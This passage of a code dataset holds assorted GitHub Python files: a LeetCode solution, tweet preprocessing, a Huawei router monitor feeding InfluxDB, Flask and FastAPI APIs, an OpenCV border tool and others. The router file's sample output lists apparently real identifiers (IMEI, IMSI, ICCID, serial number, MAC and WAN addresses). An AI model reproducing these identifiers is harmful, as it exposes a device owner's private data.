the relative positions of the remaining characters. \n(i.e., \"ace\" is a subsequence of \"abcde\" while \"aec\" is not).\n\nStatus: Completed\nNotes: This took way longer than it should have lol. Better solution in description of one of the solutions but sticking with mine fn\n'''\ndef isSubsequence(s: str, t: str):\n for i in range(len(s)): #could have just done i in s\n lastIndex = t.find(s[i]) \n t = t[lastIndex+1:]\n \n if lastIndex <= -1:\n return False\n return True\nprint(isSubsequence(\"aaaaaa\",\"bbaaaa\"))\n","repo_name":"ChoyonUddin/LeetCode","sub_path":"Completed/isSubsequence.py","file_name":"isSubsequence.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41573964981","text":"import textblob\r\nimport json\r\nfrom textblob import TextBlob\r\nfrom textblob import Word\r\nfrom textblob.classifiers import NaiveBayesClassifier\r\n\r\n'''\r\nTests :\r\nwiki = \"I was enjoying eating apples. 
She is no longer loved\"\r\ntestfr = \"J'aime manger les pommes de mon jardin\"\r\ntweettest = \"RT @Sifaoui: 1\\ufe0f\\u20e3In their translation of @EmmanuelMacron's speeches, the @AlJazeera propagandists knowingly made the French president say \\u201cI\\u2026\"\r\nblob = TextBlob(\"Comment vas-tu?\")\r\n'''\r\n\r\nwith open('StopWord/stop_words_english.json', encoding=\"utf8\") as mon_fichier:\r\n stop_words_en = json.load(mon_fichier)\r\n\r\nwith open('StopWord/stop_words_french.json', encoding=\"utf8\") as mon_fichier:\r\n stop_words_fr = json.load(mon_fichier)\r\n\r\n\r\ndef filtreCaracteres(text):\r\n \"\"\"\r\n input : text (str)\r\n output : lp (str)\r\n Removes special characters, such as emojis, from a text (string)\r\n \"\"\"\r\n\r\n l = list(text)\r\n lp = \"\"\r\n for x in l:\r\n if ord(x) <= 55295: # fixed: ord(x) instead of ord('x'), otherwise every character passed the filter\r\n lp += x\r\n return lp\r\n\r\n\r\ndef retireHttp(text):\r\n \"\"\"\r\n input : text (str)\r\n output : (str)\r\n Removes http links from a text (string)\r\n \"\"\"\r\n l = text.split(\" \")\r\n resultat = \"\"\r\n for mot in l:\r\n isHttp = mot[0:5] == \"http:\" or mot[0:6] == \"https:\"\r\n if not isHttp:\r\n resultat += mot + \" \"\r\n return resultat[:-1]\r\n\r\n\r\ndef retireAt(text):\r\n \"\"\"\r\n input : text (str)\r\n output : (str)\r\n Removes the @ signs\r\n \"\"\"\r\n return text.replace(\"@\", \"\")\r\n\r\n\r\ndef retireRetourLigne(text):\r\n \"\"\"\r\n input : text (str)\r\n output : (str)\r\n Removes line breaks\r\n \"\"\"\r\n return text.replace(\"\\n\", \"\")\r\n\r\n\r\ndef lemmatizeSentence(text):\r\n \"\"\"\r\n input : text (str)\r\n output : (str)\r\n Lemmatizes a sentence and returns the \"clean\" string (text = one sentence)\r\n \"\"\"\r\n wordTag = text.tags\r\n l = \"\"\r\n for (mot, tag) in wordTag:\r\n motLemmatise = \"\"\r\n if tag[0] != 'V':\r\n motLemmatise = Word(mot).lemmatize()\r\n else:\r\n motLemmatise = Word(mot).lemmatize() # note: identical to the branch above, so verbs get no special handling\r\n if motLemmatise not in []:\r\n l += motLemmatise + \" \"\r\n return l[:-1]\r\n\r\n\r\ndef trilangueepuration(tweetcomplexe):\r\n \"\"\"\r\n input : tweetcomplexe (str)\r\n output : S (str)\r\n Takes a string already stripped of emojis/links ... and returns the lemmatized tweet\r\n \"\"\"\r\n tweet = TextBlob(tweetcomplexe)\r\n\r\n S = \"\"\r\n for phrase in tweet.sentences:\r\n S += \" \" + lemmatizeSentence(phrase) + \".\"\r\n return S\r\n\r\n\r\ndef tweetpropre(tweetbrut):\r\n \"\"\"\r\n input : tweetbrut (str)\r\n output : (str)\r\n takes a raw tweet as parameter and returns a lemmatized string\r\n (composed of filtreCaracteres, retireAt, retireHttp, retireRetourLigne, trilangueepuration)\r\n \"\"\"\r\n tweetsanscarac = retireAt(filtreCaracteres(tweetbrut))\r\n tweetsanscarachttp = retireHttp(tweetsanscarac)\r\n twsanscarhttpligne = retireRetourLigne(tweetsanscarachttp)\r\n return trilangueepuration(twsanscarhttpligne)\r\n","repo_name":"markpiquant/insult_detector","sub_path":"process_tweet.py","file_name":"process_tweet.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"22852608765","text":"#!/usr/bin/env python3\n\"\"\"\nExample code on how to print ~all info about your router, you can try it by running:\npython3 data_dump.py http://admin:PASSWORD@192.168.8.1/\n\"\"\"\nfrom argparse import ArgumentParser\nimport os.path\nimport re\nimport pprint\nimport sys\nfrom typing import Any, Callable\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), os.path.pardir))\n\nfrom huawei_lte_api.Client import Client # noqa: E402\nfrom huawei_lte_api.Connection import Connection # noqa: E402\n\nfrom influxdb import InfluxDBClient\n\n\ninflux_client = InfluxDBClient(host='localhost', port=8086)\ninflux_client.switch_database('mydb') \n\n\nparser = ArgumentParser()\nparser.add_argument('url', type=str)\nparser.add_argument('--username', type=str)\nparser.add_argument('--password', type=str)\nargs = parser.parse_args()\nkeys_to_convert = ['CurrentConnectTime', 'CurrentUpload', 'CurrentDownload', 'CurrentDownloadRate', 'CurrentUploadRate', 'TotalUpload', 'TotalDownload', 'TotalConnectTime', 'showtraffic', 'MaxUploadRate', 'MaxDownloadRate','ConnectionStatus','CurrentNetworkType','CurrentNetworkTypeEx','CurrentServiceDomain','CurrentWifiUser','RoamingStatus','ServiceStatus','SignalIcon','cellroam' ]\n\n\nwith Connection(args.url, username=args.username, password=args.password) as connection:\n client = Client(connection)\n \n device_info = client.monitoring.traffic_statistics()\n device_info.update(client.monitoring.status())\n device_info.update(client.device.signal())\n \n device_tags = client.device.information()\n device_signal = client.device.signal()\n \n rsrp = re.findall(r'-\\d+', device_signal.get('rsrp')).pop(0)\n rsrq = re.findall(r'-\\d+.\\d+', device_signal.get('rsrq')).pop(0)\n \n rssi = re.findall(r'-\\d+', device_signal.get('rssi')).pop(0)\n sinr = re.findall(r'\\d+', device_signal.get('sinr')).pop(0)\n \n for key in keys_to_convert:\n if key in device_info:\n device_info[key] = int(device_info[key])\n # Convert data into a format suitable for InfluxDB\n\n json_body_traffic = [\n {\n \"measurement\": \"hueawei_router_traffic\",\n \"tags\": device_tags\n ,\n \"fields\": device_info\n }\n ]\n influx_client.write_points(json_body_traffic)\n\n json_body_signal = [\n {\n \"measurement\": \"hueawei_signal\",\n \"tags\": device_tags\n ,\n \"fields\": {\n \"rsrp\":float(rsrp),\n \"rsrq\":float(rsrq),\n \"rssi\":float(rssi),\n \"sinr\":float(sinr),\n }\n }\n ]\n influx_client.write_points(json_body_signal)\n\n pprint.pprint( json_body_traffic)\n pprint.pprint( json_body_signal)\n \n\"\"\"\nExample of data to be 
written to influx\n\n[{'fields': {'BatteryLevel': None,\n 'BatteryPercent': None,\n 'BatteryStatus': None,\n 'ConnectionStatus': 901,\n 'CurrentConnectTime': 16152,\n 'CurrentDownload': 595291481,\n 'CurrentDownloadRate': 9714,\n 'CurrentNetworkType': 19,\n 'CurrentNetworkTypeEx': 1011,\n 'CurrentServiceDomain': 3,\n 'CurrentUpload': 174116890,\n 'CurrentUploadRate': 5273,\n 'CurrentWifiUser': 0,\n 'MaxDownloadRate': 8371358,\n 'MaxUploadRate': 622425,\n 'PrimaryDns': '41.1.240.29',\n 'PrimaryIPv6Dns': None,\n 'RoamingStatus': 0,\n 'SecondaryDns': '41.1.239.253',\n 'SecondaryIPv6Dns': None,\n 'ServiceStatus': 2,\n 'SignalIcon': 5,\n 'SignalStrength': None,\n 'SimStatus': '1',\n 'TotalConnectTime': 1789048,\n 'TotalDownload': 8011565266,\n 'TotalUpload': 984422899,\n 'TotalWifiUser': '64',\n 'WifiConnectionStatus': None,\n 'WifiStatus': '0',\n 'WifiStatusExCustom': '0',\n 'arfcn': None,\n 'band': '3',\n 'bsic': None,\n 'cell_id': '29458206',\n 'cellroam': 1,\n 'classify': 'cpe',\n 'cqi0': '12',\n 'cqi1': '8',\n 'currenttotalwifiuser': '0',\n 'dl_mcs': 'mcsDownCarrier1Code0:15 mcsDownCarrier1Code1:16',\n 'dlbandwidth': '10MHz',\n 'dlfrequency': '1862600kHz',\n 'earfcn': 'DL:1776 UL:19776',\n 'ecio': None,\n 'enodeb_id': '0115071',\n 'flymode': '0',\n 'hvdcp_online': '0',\n 'ims': '0',\n 'lac': None,\n 'ltedlfreq': '18626',\n 'lteulfreq': '17676',\n 'maxsignal': '5',\n 'mode': '7',\n 'nei_cellid': None,\n 'pci': '266',\n 'plmn': '65501',\n 'rac': None,\n 'rrc_status': None,\n 'rscp': None,\n 'rsrp': '-79dBm',\n 'rsrq': '-8.0dB',\n 'rssi': '-57dBm',\n 'rxlev': None,\n 'sc': None,\n 'showtraffic': 1,\n 'simlockStatus': '0',\n 'sinr': '7dB',\n 'speedLimitStatus': '0',\n 'tac': '20006',\n 'tdd': None,\n 'transmode': 'TM[4]',\n 'txpower': 'PPusch:2dBm PPucch:-6dBm PSrs:0dBm PPrach:-7dBm',\n 'ul_mcs': 'mcsUpCarrier1:23',\n 'ulbandwidth': '10MHz',\n 'ulfrequency': '1767600kHz',\n 'usbup': '0',\n 'wdlfreq': None,\n 'wififrequence': '0',\n 'wifiindooronly': '0',\n 'wifiswitchstatus': '1'},\n 'measurement': 'hueawei_router_traffic',\n 'tags': {'Classify': 'cpe',\n 'DeviceName': 'B535-932',\n 'HardwareVersion': 'WL2B535M',\n 'Iccid': '89330000000029032674',\n 'Imei': '860415043074029',\n 'ImeiSvn': '09',\n 'Imsi': '655013302902967',\n 'MacAddress1': '6C:06:D6:AB:D6:3A',\n 'MacAddress2': None,\n 'Mccmnc': '65501',\n 'Msisdn': None,\n 'ProductFamily': 'LTE',\n 'SerialNumber': 'SHTUT20512000641',\n 'SoftwareVersion': '10.0.5.1(H195SP2C983)',\n 'WanIPAddress': '100.77.223.36',\n 'WanIPv6Address': None,\n 'WebUIVersion': 'WEBUI 10.0.5.1(W2SP2C7601)',\n 'WifiMacAddrWl0': '6C:06:D6:AB:D6:3B',\n 'WifiMacAddrWl1': '6C:06:D6:AB:D6:40',\n 'iniversion': 'B535-932-CUST 10.0.2.2(C1232)',\n 'spreadname_en': 'Huawei 4G Router 3 Pro',\n 'spreadname_zh': '华为4G路由3 Pro',\n 'submask': '255.255.255.255',\n 'supportmode': 'LTE|WCDMA|GSM',\n 'uptime': '16184',\n 'wan_dns_address': '41.1.240.29,41.1.239.253',\n 'wan_ipv6_dns_address': None,\n 'workmode': 'LTE'}}]\n[{'fields': {'rsrp': -79.0, 'rsrq': -8.0, 'rssi': -57.0, 'sinr': 7.0},\n 'measurement': 'hueawei_signal',\n 'tags': {'Classify': 'cpe',\n 'DeviceName': 'B535-932',\n 'HardwareVersion': 'WL2B535M',\n 'Iccid': '89330000000029032674',\n 'Imei': '860415043074029',\n 'ImeiSvn': '09',\n 'Imsi': '655013302902967',\n 'MacAddress1': '6C:06:D6:AB:D6:3A',\n 'MacAddress2': None,\n 'Mccmnc': '65501',\n 'Msisdn': None,\n 'ProductFamily': 'LTE',\n 'SerialNumber': 'SHTUT20512000641',\n 'SoftwareVersion': '10.0.5.1(H195SP2C983)',\n 'WanIPAddress': '100.77.223.36',\n 'WanIPv6Address': 
None,\n 'WebUIVersion': 'WEBUI 10.0.5.1(W2SP2C7601)',\n 'WifiMacAddrWl0': '6C:06:D6:AB:D6:3B',\n 'WifiMacAddrWl1': '6C:06:D6:AB:D6:40',\n 'iniversion': 'B535-932-CUST 10.0.2.2(C1232)',\n 'spreadname_en': 'Huawei 4G Router 3 Pro',\n 'spreadname_zh': '华为4G路由3 Pro',\n 'submask': '255.255.255.255',\n 'supportmode': 'LTE|WCDMA|GSM',\n 'uptime': '16184',\n 'wan_dns_address': '41.1.240.29,41.1.239.253',\n 'wan_ipv6_dns_address': None,\n 'workmode': 'LTE'}}]\n\"\"\"","repo_name":"splitpoint-za/huawei-lte-api-3.5.3-backport","sub_path":"examples/write_influxdb.py","file_name":"write_influxdb.py","file_ext":"py","file_size_in_byte":8106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"41456616413","text":"from xmg.compgen.BrickSpec import BrickSpec, Plug\n\nclass StardimBrickSpec(BrickSpec):\n\n def __init__(self, name, brick_name, plugs):\n self.proxy = plugs[\"proxy\"]\n del plugs[\"proxy\"]\n super().__init__(name, brick_name, plugs)\n\n def deref_plugs(self, table):\n proxy = table[self.proxy]\n ctrl = proxy.control_name\n self.tag = proxy.tag\n self.plugs[\"_Constraint\"] = [Plug(ctrl + \"._Stmt\")]\n super().deref_plugs(table)\n\n def init_brick(self, brick):\n brick._text = \"\"\"\n%%%%\n\nStmt : _Stmt '*=' _Constraint {$$=control:and($1,dim:dim('%s',$3))} ;\n\n%%%%\n\"\"\" % self.tag\n","repo_name":"spetitjean/XMG-2","sub_path":"contributions/compat/bricks/stardim/pylib/brickspec.py","file_name":"brickspec.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"33241445251","text":"from flask import Flask, render_template , Response , request , jsonify\nimport pandas as pd\nimport time\nimport random as rd\nfrom path import heart_beat_csv,location_csv#sample data for testing\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n return render_template('home.html')\n\n#apis\n\n@app.route('/api/heartbeat', methods=['GET'])\ndef heartbeat():\n if request.method == 'GET':\n t = time.localtime(time.time())\n return jsonify([[t.tm_sec,rd.randint(80.0, 88.0)]])\n\n@app.route('/api/cell', methods=['GET'])\ndef cell():\n if request.method == 'GET':\n t = time.localtime(time.time())\n return jsonify(rd.randint(56.0, 60.0))\n \n \n@app.route('/api/heartbeat-single', methods=['GET'])\ndef heartbeat_single():\n if request.method == 'GET':\n t = time.localtime(time.time())\n return jsonify([[t.tm_sec,rd.randint(80.0, 88.0)]])\n\n@app.route('/api/location', methods=['GET'])\ndef location():\n if request.method == 'GET':\n data = pd.read_csv(location_csv)\n out = data.to_dict(orient='records')\n return jsonify({'data': out})\n\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',debug=True,port=5000)","repo_name":"gamingflexer/telementary-dashboard","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"9904635454","text":"#!/usr/bin/env python3\n\nfrom sqlalchemy import create_engine\n\nfrom data_manager.orm import Base\n\n\ndef main():\n ################################\n # Step 1: Create the SQL engine\n ################################\n\n # More detailed info on used DB URL scheme (can also include username, password, etc.):\n # https://docs.sqlalchemy.org/en/20/core/engines.html#database-urls\n\n # Could be one a remote machine:\n # engine = 
create_engine(\"mysql://username@host:/database_name\")\n\n # For playing around, we can create an in-memory DB that only exists for\n # as long as our program is running\n # engine = create_engine(\"sqlite://\")\n\n # Create DB at absolute file path (4 leading slashes):\n # engine = create_engine(\"sqlite:////home/user/Documents/MyDB.sqlite\")\n\n # Create DB using a relative path (3 leading slashes)\n engine = create_engine(\"sqlite:///sampleDB.sqlite\")\n\n # Note: SQLite is the only DB where the DB itself is stored as a file. All other\n # backends require a daemon process to run on the target machine and those won't\n # create simple files for individual DBs\n\n ################################\n # Step 2: Initialize our DB\n ################################\n\n # Note: All the tables contained in data-manager are registered to this Base class\n # Therefore, it knows what tables shall exist and is able to (and responsible for)\n # create all tables that we need\n Base.metadata.create_all(engine)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"KoehnLab/data-manager","sub_path":"demo/01_initialize_database.py","file_name":"01_initialize_database.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14784682817","text":"import numpy as np\nimport tensorflow as tf\n\n\ndef get_iou_vector(A, B):\n batch_size = A.shape[0]\n metric = []\n for batch in range(batch_size):\n t, p = A[batch] > 0, B[batch] > 0\n # if np.count_nonzero(t) == 0 and np.count_nonzero(p) > 0:\n # metric.append(0)\n # continue\n # if np.count_nonzero(t) >= 1 and np.count_nonzero(p) == 0:\n # metric.append(0)\n # continue\n # if np.count_nonzero(t) == 0 and np.count_nonzero(p) == 0:\n # metric.append(1)\n # continue\n\n intersection = np.logical_and(t, p)\n union = np.logical_or(t, p)\n iou = (np.sum(intersection > 0) + 1e-10) / (np.sum(union > 0) + 1e-10)\n thresholds = np.arange(0.5, 1, 0.05)\n s = []\n for thresh in thresholds:\n s.append(iou > thresh)\n metric.append(np.mean(s))\n\n return np.mean(metric)\n\n\ndef my_iou_metric(label, pred):\n return tf.py_func(get_iou_vector, [label, pred > 0.5], tf.float64)\n\n\ndef my_iou_metric_2(label, pred):\n return tf.py_func(get_iou_vector, [label, pred > 0], tf.float64)","repo_name":"DzvinkaYarish/kaggle_tgs_salt_challenge","sub_path":"keras_data_analysis/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"34608462902","text":"from setup import app, write_client, read_api, geo, ORG, PARAMETERS, PARAMETERS_ENUM, BUCKET, BASE_DIR\nfrom fastapi.responses import ORJSONResponse\nfrom classes import Data, Dates\nfrom functions import get_query, list_all_items\nfrom pandas import read_json\nfrom uvicorn import run\nfrom io import StringIO\nimport json\n\n\n# -----------Routes-----------\n@app.post(\"/api/{param}/new/\", tags=[\"Add item\"], summary=\"Add new data to database\")\nasync def add_new_data(data: Data, param: PARAMETERS_ENUM):\n param = param.value\n if param not in PARAMETERS:\n return {\"error\": \"parameter does not match\"}\n\n data_df = read_json(StringIO(data.data), orient=\"split\").set_index('time')\n try:\n if param == \"openaq\":\n write_client.write(data_df, data_frame_measurement_name=\"openaqsensor\",\n data_frame_tag_columns=['country', 'country_code', 'id', 'region'])\n if param == \"wekeo\":\n 
write_client.write(\n data_df, data_frame_measurement_name=\"wekeosensor\", data_frame_tag_columns=['id'])\n return {\"message\": f\"{param} data succesfully added to database\"}\n except Exception as e:\n return {\"message\": f\"error with adding {param} data to database: {e}\"}\n\n\n@app.get(\"/api/locations/\", tags=[\"Latest data\"], summary=\"Get all used locations\")\nasync def locations():\n try:\n query = f\"\"\"import \"influxdata/influxdb/schema\"\n schema.tagValues(\n bucket: \"{BUCKET}\",\n tag: \"country_code\",\n start: 0,\n )\"\"\"\n response = read_api.query(query, org=ORG)\n\n country_codes = []\n for table in response:\n for record in table.records:\n country_codes.append(record.values['_value'])\n\n file = open(f\"{BASE_DIR}/country_codes.json\")\n country_codes_file = json.load(file)\n countries = []\n for country_code in country_codes:\n if country_code in country_codes_file:\n countries.append(\n {country_codes_file[country_code]: country_code})\n file.close()\n\n query = f\"\"\"import \"influxdata/influxdb/schema\"\n schema.tagValues(\n bucket: \"{BUCKET}\",\n tag: \"region\",\n start: 0\n )\"\"\"\n response = read_api.query(query, org=ORG)\n\n records_regions = []\n for table in response:\n for record in table.records:\n records_regions.append(record.values['_value'])\n\n data = []\n for country in countries:\n country_data = {}\n \n country_code = list(country.values())[0]\n country_name = list(country.keys())[0]\n country_data.update({\"country\": country_name})\n \n regions = []\n for region in records_regions:\n locations = geo.geocode(\n region, country_codes=country_codes, language=\"en\", timeout=10).raw[\"display_name\"]\n locations = locations.split(\", \")\n if locations[-1] == country_name:\n regions.append(locations[0])\n country_data.update({\"code\": country_code})\n country_data.update({\"regions\": regions})\n\n data.append({country_name: country_data})\n return ORJSONResponse(data, status_code=200)\n except Exception as e:\n return {\"error\": str(e)}\n\n\n@app.get(\"/api/{param}/\", tags=[\"Latest data\"], summary=\"Get all latest data from all items from used parameter\")\nasync def data_by_param(param: PARAMETERS_ENUM):\n param = param.value\n if param not in PARAMETERS:\n return {\"error\": \"parameter does not match\"}\n\n try:\n query = get_query(param)\n response = read_api.query(query, org=ORG)\n return ORJSONResponse(list_all_items(response), status_code=200)\n except Exception as e:\n return {\"error\": str(e)}\n\n\n@app.get(\"/api/{param}/{id}/\", tags=[\"Specific data (with timestamps)\"], summary=\"Get data from used parameter, filtered by id\")\nasync def all_data_by_param_and_id(param: PARAMETERS_ENUM, id: str, dates: Dates = None):\n # TIME FILTER FORMAT FOR REQUEST: 2023-11-15T12:00:00\n param = param.value\n if param not in PARAMETERS:\n return {\"error\": \"parameter does not match\"}\n\n if dates != None:\n start_date = f\"{dates.start_date}Z\"\n stop_date = f\"{dates.stop_date}Z\"\n else:\n start_date = None\n stop_date = None\n\n try:\n query = get_query(param=param, id=id,\n start_date=start_date, stop_date=stop_date)\n response = read_api.query(query, org=ORG)\n return ORJSONResponse(list_all_items(response, start_date, stop_date), status_code=200)\n except Exception as e:\n return {\"error\": str(e)}\n\n\n@app.get(\"/api/{param}/{id}/{data}/\", tags=[\"Specific data (with timestamps)\"], summary=\"Get specific data from used parameter, filtered by id\")\nasync def specific_data_by_param_and_id(param: PARAMETERS_ENUM, id: 
str, data: str, dates: Dates = None):\n # TIME FILTER FORMAT FOR REQUEST: 2023-11-15T12:00:00\n param = param.value\n if param not in PARAMETERS:\n return {\"error\": \"parameter does not match\"}\n\n if dates != None:\n start_date = f\"{dates.start_date}Z\"\n stop_date = f\"{dates.stop_date}Z\"\n else:\n start_date = None\n stop_date = None\n\n try:\n query = get_query(param=param, id=id, data=data,\n start_date=start_date, stop_date=stop_date)\n response = read_api.query(query, org=ORG)\n return ORJSONResponse(list_all_items(response, start_date, stop_date), status_code=200)\n except Exception as e:\n return {\"error\": str(e)}\n\n\nif __name__ == \"__main__\":\n run(\"main:app\", host=\"0.0.0.0\", port=6000, proxy_headers=True, forwarded_allow_ips=['*'], workers=2)\n","repo_name":"Sten-AP/AIrsight","sub_path":"backend/FastAPI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74214685633","text":"import cv2 as cv\nimport sys\nimport numpy as np\nfrom rembg import remove\nimport argparse\n\n\ndef correct(img,cb,v):\n T=0\n D=img.shape[0]\n L=0\n R=img.shape[1]\n t=cb[1] \n d=cb[3]\n l=cb[0]\n r=cb[2]\n if t>d:\n t,d=d,t \n if l>r:\n l,r=r,l\n l-=v\n t-=v\n d+=v \n r+=v \n if t<0:\n t=0\n if d>D:\n d=D\n if l<0:\n l=0\n if r>R:\n r=R\n return [l,t,r,d]\n \n \n \ndef makeBorder(img,cb):\n \n #img boundaries\n T=0\n D=img.shape[0]\n L=0\n R=img.shape[1]\n \n cb=correct(img,cb,0)\n #crop boundaries\n t=cb[1] #top\n d=cb[3] #bottom\n l=cb[0] #left\n r=cb[2] #right\n \n \n cropped=img[t:d,l:r]\n nbg=remove(cropped)\n \n red=np.array([0,0,255]) #red pixel\n bg=np.zeros(4)\n #bg=np.ones(4)\n bg+=100 #tolerating value of background pixel till 100(nearly black)\n #rather than 0(exact black) to smoothen the drawn border\n \n #horizontal processing\n for h in range(t,d):\n B=C=0 #B --> black pixel and C --> coloured pixel\n \n for w in range(l,r):\n \n if np.ndarray.all(np.less(nbg[h-t][w-l],bg)): #checks if a pixel is nearly black\n B+=1\n if C>9:\n C=0\n for i in range(10):\n if w+i9:\n B=0\n for i in range(10):\n if w-i>=L:\n img[h][w-i]=red\n \n \n #vertical processing\n for w in range(l,r):\n \n B=C=0\n for h in range(t,d):\n \n if np.ndarray.all(np.less(nbg[h-t][w-l],bg)):\n B+=1\n if C>9:\n C=0\n for i in range(10):\n if h+i9:\n B=0\n for i in range(10):\n if h-i>=T:\n img[h-i][w]=red\n \n return img.copy()\n \n# instead of using the default technique of replacing the entire region,\n# we only replace the drawn portion of the image which is faster and visually smooth than the selectROI provided by cv2\ndef redo(oldcb,image,drawn):\n oldcb=correct(image,oldcb,6)\n image[oldcb[1]:oldcb[3],oldcb[0]:oldcb[2]]=drawn[oldcb[1]:oldcb[3],oldcb[0]:oldcb[2]]\n \n\n# my version of simplified selectROI to implement q-->quit, c-->clear functionality smoothly\n# mainly to override behaviour of clicking c in cv.selectROI\ndef selectROI(event,x,y,flags,param):\n global ix,iy,drawing,image,cb,oldcb\n blue=np.array([255,0,0])\n if event == cv.EVENT_LBUTTONDOWN:\n if len(oldcb)==4:\n redo(oldcb,image,drawn) \n drawing = True\n ix,iy = x,y\n cb=[x,y]\n oldcb=[x,y]\n elif event == cv.EVENT_MOUSEMOVE:\n if drawing == True:\n if len(oldcb)==4:\n redo(oldcb,image,drawn)\n cv.rectangle(image,(ix,iy),(x,y),(255,0,0),5)\n oldcb=[ix,iy,x,y]\n elif event == cv.EVENT_LBUTTONUP:\n drawing = False\n if len(oldcb)==4:\n redo(oldcb,image,drawn)\n cv.rectangle(image,(ix,iy),(x,y),(255,0,0),5)\n 
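# --- Editor's note (descriptive summary, not part of the original record) ---
# State machine of this mouse callback: LBUTTONDOWN restores any previously drawn
# rectangle and stores the anchor corner (ix, iy); MOUSEMOVE repeatedly restores
# only the previously drawn region via redo() before drawing the new preview
# rectangle, which is what keeps dragging cheap; LBUTTONUP finalizes cb as
# [ix, iy, x, y], or clears cb and oldcb when the mouse did not move (a plain
# click deselects).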
oldcb=[ix,iy,x,y]\n if((x,y)==(ix,iy)):\n cb=[]\n oldcb=[]\n else:\n cb.append(x)\n cb.append(y)\n \n\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required = True, help =\"Path to the image\")\nap.add_argument(\"-o\", \"--output\", required = False, help =\"specify the output path of the image\")\nargs = vars(ap.parse_args())\n\ncb=[] #crop_boundaries\noldcb=[]\ndrawing = False\nix,iy = -1,-1\nf=args['image'].split('.')\no=args['output']\nfilename=f[0]\nextension=f[1]\noutput=filename+'_output.'+extension if o==None else o\n\ntry:\n image=cv.imread(args['image'])\nexcept:\n sys.exit('Failed to load image')\n \nprint('Use mouse to select a region by \"click and drag\"')\nprint('Press \"ENTER\" button to validate the region drawn by mouse')\nprint('Press \"c\" button to delete all borders and load original image')\nprint('Press \"s\" button to save the image with border')\nprint('Press \"q\" button to close or quit the script')\n\ndrawn=image.copy()\noriginal=image.copy()\ncv.namedWindow('image',cv.WINDOW_NORMAL)\ncv.setMouseCallback('image',selectROI)\nwhile(True):\n cv.imshow(\"image\", image)\n k=cv.waitKey(1)\n if k==ord('q') or k==ord('Q'):\n break\n elif k==13 and len(cb)==4:\n image=drawn.copy()\n drawn=makeBorder(image,cb)\n \n elif k==ord('c') or k==ord('C'):\n image=original.copy()\n drawn=original.copy()\n \n elif k==ord('s') or k==ord('S'):\n try:\n cv.imwrite(output,drawn)\n except:\n cv.imwrite(output+'.'+extension,drawn)\n\n\ncv.destroyAllWindows()\n\n","repo_name":"Jarosh-Antony/Auto-border-drawing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15649746405","text":"import os\r\nimport numpy as np\r\nimport re\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\nfrom math import radians, cos, sin, asin, sqrt\r\n\r\ndef cal_distance_meter(lat1, lng1, lat2, lng2):\r\n\r\n lng1, lat1, lng2, lat2 = map(radians, [lng1, lat1, lng2, lat2])\r\n\r\n d_lon = lng2-lng1\r\n\r\n d_lat = lat2-lat1\r\n\r\n a=sin(d_lat/2)**2 + cos(lat1) * cos(lat2) * sin(d_lon/2)**2\r\n\r\n dis=2*asin(sqrt(a))*6371*1000\r\n\r\n return dis\r\n\r\ndef judge_dis(dis1, dis2):\r\n return dis1 < 2000 or dis2 < 2000\r\n\r\ndef judge_time(t1, t2):\r\n return abs(int(t1)-int(t2)) <= 1\r\n\r\ndef get_lat_lon(id, lonlat_dict):\r\n values = lonlat_dict.get(int(id))\r\n\r\n if values == None:\r\n return 1.0, 1.0\r\n else:\r\n return values[0],values[1]\r\n\r\ndef cal_f1(filepath):\r\n print('------------------------------')\r\n print('dealing with file:', filepath)\r\n file = open(filepath,'r')\r\n our_error_lines = file.readlines()\r\n data_lines = open('./data/final_test/20111129.csv', 'r').readlines()\r\n test_line = open('./data/accident/n_11.29.csv', 'r',encoding=\"gb2312\").readlines()\r\n\r\n lonlat_matrix = np.loadtxt(r'./data/map/beijing.csv', delimiter = '\\t')\r\n lonlat_dict = {}\r\n for i in range(len(lonlat_matrix)):\r\n numbert = int(lonlat_matrix[i][0])\r\n lat = lonlat_matrix[i][1]\r\n lon = lonlat_matrix[i][2]\r\n lonlat_dict[numbert] = [lon,lat]\r\n\r\n TP1 = 0\r\n wrongset = set()\r\n\r\n for i in range(len(our_error_lines)):\r\n message1 = our_error_lines[i].split(',')\r\n road_id = int(message1[0])\r\n time1 = message1[1]\r\n message2 = data_lines[road_id].split(',')\r\n road_osm1 = message2[0]\r\n road_osm2 = message2[1]\r\n X1,Y1 = get_lat_lon(road_osm1, lonlat_dict)\r\n X2,Y2 = 
